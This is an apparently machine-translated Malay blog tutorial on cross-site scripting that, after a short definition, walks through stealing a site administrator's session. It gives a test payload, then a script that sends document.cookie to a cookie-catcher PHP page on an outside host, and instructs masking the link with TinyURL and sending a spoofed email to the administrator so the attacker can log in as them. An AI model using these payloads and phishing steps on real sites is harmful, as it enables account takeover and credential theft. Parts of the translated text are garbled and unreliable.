Mari belajar Cross-Site Scripting ( XSS )



Cross-Site Scripting

Cross-site scripting (XSS) adalah sejenis kelemahan keselamatan komputer biasanya ditemui dalam aplikasi web yang direka oleh pengedit HTML . Disebabkan pelanggaran keselamatan pelayar , XSS membolehkan penyerang untuk menyuntik client-side skrip ke dalam laman web yang dilihat oleh pengguna lain. Satu kelemahan cross-site scripting boleh digunakan oleh penyerang untuk memintas kawalan akses seperti polisi asal yang sama.


Majoriti .

Serangan XSS sentiasa memberi tumpuan kepada laman web yang menggunakan cookies yang menyimpan username dan password anda.

Matlamat akhir pengguna yang berniat jahat adalah untuk mencuri cookies pengguna tapak, supaya anda kemudian boleh menyamar mereka.

Laman ini telah dimuatkan cookies apabila komputer anda, jika anda memuat semula halaman yang anda harus melihat kaunter di atas kenaikan halaman.


Kod :

(script)alert(document.cookie)(/script)

PESANAN : Anda perlu untuk menukar () tag skrip ke <> untuk melaksanakan kod. Hanya menggunakan kod HTML untuk tag skrip .


Klik SEARCH . Jika anda melihat popup javascript bermakna vulnarable XSS. Langkah seterusnya :

Kod :

(script)document.location="www.examplecom/cookie catcher.php?c=" + document.cookie(/script)



PESANAN : Anda perlu untuk menukar () tag skrip ke <> untuk melaksanakan kod. Hanya menggunakan kod HTML untuk tag skrip .



Sekarang pergi ke http://www.tinyurl.com . Cuba untuk mencari pentadbir laman E-mail di dalam laman web yang terdedah dan menghantar e-mel palsu daripada Mailer palsu di atas talian. Sekarang dalam badan hanya memberitahu sesuatu yang palsu seperti : "Saya menjumpai pepijat dalam laman web anda Dan memberi pautan shrink search.php itu yang anda tambah infront kod kepadanya . Jadi Tinyurl akan topeng dan sebaik sahaja dia pergi. link anda akan melihat cookies beliau dalam cookies.html anda dan dia hanya akan dibawa ke pautan di penangkap kuki anda. Tidak kira apa yang dia lakukan atau perubahan kata laluan beliau anda masih boleh login sebagai dia .






0 comments:

Post a Comment